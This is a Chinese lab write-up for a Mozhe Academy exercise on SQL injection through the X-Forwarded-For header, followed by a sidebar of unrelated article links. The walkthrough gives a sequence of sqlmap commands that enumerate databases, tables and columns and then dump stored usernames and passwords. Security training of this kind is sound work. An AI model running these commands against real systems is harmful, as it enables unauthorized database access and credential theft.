当前位置:网站首页>墨者学院-X-Forwarded-For注入漏洞实战
墨者学院-X-Forwarded-For注入漏洞实战
2022-06-26 23:42:00 【Lyswbb】
根据题目可知漏洞点存在于XFF中
访问后就一个登陆后台
随便输入用户名和密码然后burp抓包,当没有XFF的时候会显示你的真实地址
添加XFF后可以看到IP变化了,证明后端是从XFF中获取客户端IP
尝试对XFF进行注入,sqlmap一把梭
python sqlmap.py -r 1.txt -p X-Forwarded-For
爆库名
python sqlmap.py -r 1.txt -p X-Forwarded-For --dbs
爆表名
python sqlmap.py -r 1.txt -p X-Forwarded-For -D webcalendar --tables
爆字段名
python sqlmap.py -r 1.txt -p X-Forwarded-For -D webcalendar -T user --columns
爆username中所有的数据
python sqlmap.py -r 1.txt -p X-Forwarded-For -D webcalendar -T user -C username -dump
爆password所有的数据
python sqlmap.py -r 1.txt -p X-Forwarded-For -D webcalendar -T user -C password -dump
边栏推荐
- 串口调试工具 mobaxterm 下载
- 互联网行业,常见含金量高的证书,看看你有几个?
- Can I open an account for stock trading on my mobile phone? Is it safe to open an account for stock trading on the Internet
- Ten thousand words explanation - mindarmour Xiaobai tutorial!
- Safe and cost-effective payment in Thailand
- 为什么EDR需要深度防御来打击勒索软件?
- 软件工程导论——第四章——形式化说明技术
- CVE-2022-30190 Follina Office RCE分析【附自定义word模板POC】
- Le principe le plus complet de formation à la précision hybride pour l'ensemble du réseau
- 大咖讲 | 最前沿的昇思MindSpore开源社区运营的经验分享,快拿出小本本记录呀!
猜你喜欢
![[微服務]認識微服務](/img/62/e826e692e7fd6e6e8dab2baa4dd170.png)
[微服務]認識微服務
一篇文章带你学会容器逃逸
Color matching and related issues
Let agile return to its original source -- Some Thoughts on reading the way of agile neatness
如何通俗易懂的描述机器学习的流程?
运用物理信息神经网络求解流体力学方程
Pinpoint attackers with burp
让敏捷回归本源——读《敏捷整洁之道》有感
![[test] the content of the hottest test development learning route has been updated again to help pass the customs and open the test of large factories](/img/ee/b7cb528b79036896da781b73620758.jpg)
[test] the content of the hottest test development learning route has been updated again to help pass the customs and open the test of large factories
12 color ring three primary colors
随机推荐
[microservices] understanding microservices
Introduction to message queuing
Target tracking shooting? Target occlusion shooting? With 1.9 billion installed petal apps, what unique features attract users?
串口调试工具 mobaxterm 下载
Deep learning method for solving mean field game theory problems
为什么EDR需要深度防御来打击勒索软件?
[micro service]nacos
想买股票请问在券商公司的哪里开户佣金低更安全
泰国安全又划算的支付方式
Analysis on the advantages and disadvantages of the best 12 project management systems at home and abroad
Crawler and Middleware of go language
No clue about complex data?
Is it safe to buy pension insurance online? Is there a policy?
【Try to Hack】正向shell和反向shell
用户在hander()goroutine,添加定时器功能,超时则强踢出
test
论文学习——降雨场次划分方法对降雨控制率的影响分析
My advanced learning notes of C language ----- keywords
Can I open an account for stock trading on my mobile phone? Is it safe to open an account for stock trading on the Internet
Pinpoint attackers with burp